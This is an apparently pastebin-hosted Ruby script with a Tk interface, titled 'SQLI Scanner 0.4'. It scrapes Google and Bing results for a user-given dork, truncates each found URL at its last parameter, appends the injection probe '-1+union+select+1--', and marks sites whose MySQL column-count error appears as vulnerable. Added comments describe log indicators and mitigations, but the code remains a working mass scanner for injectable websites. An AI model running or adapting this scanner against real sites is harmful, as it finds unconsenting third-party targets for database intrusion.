Doddy

SQLI Scanner 0.4 - Scanner Google (Tk)

Jan 1st, 2015
  1. #!/usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Google Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
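  # Fetch +web+ with a browser-like User-Agent and return the response body
  # ("toma" is Spanish for "take").
  #
  # The URLs handed to this helper are built from scraped search-result pages,
  # so they are untrusted input. Kernel#open treats a string that starts with
  # "|" as a command to spawn and any other non-URL string as a local path;
  # anything that is not an explicit http:// or https:// URL is therefore
  # refused before open is reached.
  #
  # @param web [String] absolute http:// or https:// URL
  # @return [String] the response body, or the literal "Error" on any failure
  #   (a caller cannot tell a failed fetch from a page whose body is "Error")
  def toma(web)
    # Allow-list the scheme; \A anchors at the start of the string, not the line.
    return "Error" unless web.to_s =~ /\Ahttps?:\/\//i

    open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    # Best-effort fetch: every StandardError collapses to the sentinel string.
    "Error"
  end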
  20.  
  21.  
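  # GET +web+ over TLS and return the response body.
  #
  # TLS is switched on unconditionally, whatever scheme the URL carries, and
  # the peer certificate is verified. With OpenSSL::SSL::VERIFY_NONE any
  # certificate is accepted, so whoever sits on the network path can replace
  # the response that the callers go on to parse.
  #
  # Nothing is rescued here: a malformed URL, a connection failure or a
  # certificate error propagates to the caller.
  #
  # @param web [String] absolute URL of the page to fetch
  # @return [String] the response body
  def toma_ssl(web)
    uri = URI.parse(web)
    nave = Net::HTTP.new(uri.host, uri.port)
    nave.use_ssl = true
    nave.verify_mode = OpenSSL::SSL::VERIFY_PEER
    # The User-Agent pairs rv:25.0 with Firefox/20.0, a combination a genuine
    # browser would not send.
    nave.get(uri.request_uri, {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  end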
  29.  
  30.  
  # POST +arg+ to +web+ over plain HTTP and return the response body.
  #
  # No TLS is configured on the connection, and only the path component of the
  # URL is sent (any query string is dropped by uri.path).
  #
  # @param web [String] absolute URL to post to
  # @param arg [String] request body passed straight to Net::HTTP#post
  # @return [String] the response body, or the literal "Error" on any failure
  def tomar(web, arg)
    destino = URI(web)
    cabeceras = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    Net::HTTP.new(destino.host, destino.port).post(destino.path, arg, cabeceras).body
  rescue
    # Every StandardError (bad URL, refused connection, ...) becomes "Error".
    "Error"
  end
  41.  
  # Truncate each link just after its last "=" ("cortar" is Spanish for "cut").
  #
  # The pattern is greedy, so everything up to and including the final "=" on
  # the line is kept and the value that followed it is discarded. Entries that
  # contain no "=" are dropped. Nested arrays are flattened first.
  #
  # @param pages [Array<String>] links, possibly nested
  # @return [Array<String>] one truncated string per entry that contained "="
  def cortar(pages)
    pages.flatten.each_with_object([]) do |page, recortes|
      recortes << (Regexp.last_match(1) + "=") if page =~ /(.*)=(.*)/
    end
  end
  55.  
  56.  
  # Collect result links from www.google.com.ar search pages for +dork+.
  #
  # One request is made per element of the String range "1"..pages; the
  # start offset is 10 on the first request and grows by 10 each time. Only
  # the first space of the query is turned into "+" (String#sub). Links are
  # pulled out of the returned HTML with regular expressions tied to one
  # particular result-page markup, then URL-decoded and de-duplicated.
  #
  # Errors raised by toma_ssl are not rescued here.
  #
  # @param dork [String] search query
  # @param pages [String] upper bound of the String range "1"..pages
  # @return [Array<String>] unique decoded links
  def google(dork, pages)
    consulta = dork.sub(/ /, "+")
    encontrados = []
    desde = 0
    ("1"..pages).each do
      desde += 10
      html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + desde.to_s)
      html.scan(/(?<="r"><. href=")(.+?)"/).flatten.each do |href|
        # Result hrefs wrap the real target in a url?q=...&amp;sa redirect.
        next unless href =~ /url\?q=(.*)&amp;sa/

        encontrados.push(URI::decode(Regexp.last_match(1)))
      end
    end
    encontrados.uniq
  end
  78.  
  # Fallback collector: same search requests as google, but links are taken
  # from every URI found in the page rather than from the result markup.
  #
  # URI::extract lists all URIs in the HTML; those matching "cache:<x>:<y>+"
  # contribute "http://" + <y>, URL-decoded. The list is de-duplicated before
  # it is returned. Errors raised by toma_ssl are not rescued here.
  #
  # @param dork [String] search query (only its first space becomes "+")
  # @param pages [String] upper bound of the String range "1"..pages
  # @return [Array<String>] unique decoded links
  def google_recursive(dork, pages)
    consulta = dork.sub(/ /, "+")
    acumulado = []
    desde = 0
    ("1"..pages).each do
      desde += 10
      html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + desde.to_s)
      URI::extract(html).each do |candidato|
        next unless candidato =~ /cache:(.*?):(.*?)\+/

        acumulado.push(URI::decode("http://" + Regexp.last_match(2)))
      end
    end
    acumulado.uniq
  end
  99.  
  # Collect result links from www.bing.com search pages for +dork+.
  #
  # Requests go over plain HTTP through toma, so a failed fetch yields the
  # string "Error" and simply produces no matches. For each page the <h2>
  # anchors are read first, then the <h3> anchors; links pointing at
  # http://778802.r.msn.com/ are skipped. Nothing in the visible script calls
  # this method.
  #
  # @param dork [String] search query (only its first space becomes "+")
  # @param pages [String] upper bound of the String range "1"..pages
  # @return [Array<String>] unique decoded links
  def bing(dork, pages)
    consulta = dork.sub(/ /, "+")
    acumulado = []
    desde = 0
    ("1"..pages).each do
      desde += 10
      html = toma("http://www.bing.com/search?q=" + consulta + "&first=" + desde.to_s)
      [/<h2><a href="(.*?)" h/, /<h3><a href="(.*?)" h/].each do |patron|
        html.scan(patron).flatten.each do |href|
          decodificado = URI::decode(href)
          acumulado.push(decodificado) unless decodificado =~ /http:\/\/778802\.r\.msn\.com\//
        end
      end
    end
    acumulado.uniq
  end
  131.  
  132. #
  133.  
  # Tk front end: two entry fields (dork, pages), a console text area and a
  # Search button whose callback runs the whole scan on the Tk event thread.
  #
  # What the callback does, for anyone triaging this script or its traffic:
  #   * collects links with google, falling back to google_recursive when the
  #     first pass returns nothing, and truncates each after its last "="
  #     with cortar;
  #   * requests every truncated link with the fixed suffix
  #     "-1+union+select+1--" appended and prints [OK] when the body contains
  #     the database error text matched below, [FAIL] otherwise.
  # The fixed suffix in the request line and the hard-coded User-Agent strings
  # in the fetch helpers are stable indicators in web-server logs. The check
  # depends entirely on the application echoing database error text, so
  # parameterised queries and generic error pages leave it nothing to match.
  color_fondo = "black"
  color_texto = "green"

  window = TkRoot.new do
    title "SQLI Scanner 0.4 - Scanner Google"
    background color_fondo
  end
  window['geometry'] = '300x320-20+10'

  TkLabel.new(window) {
    background color_fondo
    foreground color_texto
    text "    Dork : "
    place('relx'=>"0.1",'rely'=>"0.1")
  }

  dork = TkEntry.new(window) do
    background color_fondo
    foreground color_texto
    width 25
    place('relx'=>0.3,'rely'=>0.1)
  end

  TkLabel.new(window) {
    background color_fondo
    foreground color_texto
    text "    Pages : "
    place('relx'=>"0.1",'rely'=>"0.2")
  }

  pages = TkEntry.new(window) do
    background color_fondo
    foreground color_texto
    width 25
    place('relx'=>0.3,'rely'=>0.2)
  end

  TkLabel.new(window) {
    background color_fondo
    foreground color_texto
    text "Console"
    place('relx'=>0.4,'rely'=>0.3)
  }

  console = TkText.new(window) {
    background color_fondo
    foreground color_texto
    width 30
    height 9
    place('relx'=>0.1,'rely'=>0.4)
  }

  # Search-button callback. Note that the two assignments below rebind the
  # captured locals `dork` and `pages` from the entry widgets to their text.
  buscar = proc {
    dork = dork.value.to_s
    pages = pages.value.to_s

    console.insert("end", "[+] Searching in Google ...\n\n")
    links = cortar(google(dork, pages))

    if links.empty?
      console.insert("end", "[+] Searching in Google again ...\n\n")
      links = cortar(google_recursive(dork, pages))
    end

    console.insert("end", "[+] Pages Count : " + links.count.to_s + "\n\n")
    console.insert("end", "[-] Links not found") if links.empty?

    links.flatten.each do |link|
      console.insert("end", "[+] Link : " + link)
      begin
        respuesta = toma(link + "-1+union+select+1--")
        # toma returns "Error" on a failed fetch, which falls through to [FAIL].
        if respuesta =~ /The used SELECT statements have a different number of columns/
          console.insert("end", " [OK]\n\a\a")
        else
          console.insert("end", " [FAIL]\n")
        end
      rescue
        console.insert("end", " [FAIL]\n")
      end
    end

    console.insert("end", "\n[+] Finished")
  }

  TkButton.new(window) do
    text "Search"
    background color_fondo
    foreground color_texto
    width 17
    activebackground color_texto
    highlightbackground color_texto
    command buscar
    place('relx'=>0.3,'rely'=>0.9)
  end

  Tk.mainloop
  228.  
  229. #The End ?